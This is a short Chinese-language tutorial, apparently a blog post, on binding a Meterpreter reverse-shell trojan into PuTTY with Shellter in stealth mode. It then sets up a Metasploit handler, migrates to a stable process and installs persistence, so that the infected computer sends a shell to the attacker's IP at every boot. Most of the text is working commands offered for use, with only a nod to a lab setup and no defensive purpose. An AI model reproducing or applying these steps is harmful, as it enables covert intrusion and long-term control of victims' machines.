安装Shellter:

apt-get install shellter

打开shellter

59512519bfdf686a0229ca305ab43e33.png

操作模式选择A,PE Target: 输入要捆绑木马的软件的目录,这里用putty做实验(必须是32位的程序):

f6fcaab0764e3a7174dabf36d8c7d361.png

选择是否使用隐形模式进入:选择Y

0e07fc2aeda319751c9cbd0149790141.png

选择payload 或 custom:L

PAYLOAD选择:1(反弹连接)

e8239375f76e52b657442bd4648af47a.png

设置LHOST填控制者的IP

LPORT填反弹连接的端口,随便填一个端口

打开msfconsole

msfconsole

依次输入:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.X.X(控制者的IP)

set LPORT 1314(反弹连接的端口,必须和木马上的一样)

run(开始监听)

2c6b1c17036ec361b142569aa45f0ea2.png

在另一个虚拟机或者电脑运行捆绑好木马的软件

8fd2f67c56c6bf1ec1e83c1c63ec1375.png

将木马切换到一个比较稳定的进程,防止捆绑软件关闭后木马随之关闭

run post/windows/manage/migrate

安装后门

run persistence -X -i 30(多少秒发送一次连接) -p 1314(端口) -r 192.168.64.144(控制者IP)

输入shell,拿到shell,开始搞事情,只要中木马的电脑开机并且联网,就会把shell发送给控制者的电脑

2516662f95d2ccac4f1d463c9a9d8bdd.png

Logo

更多推荐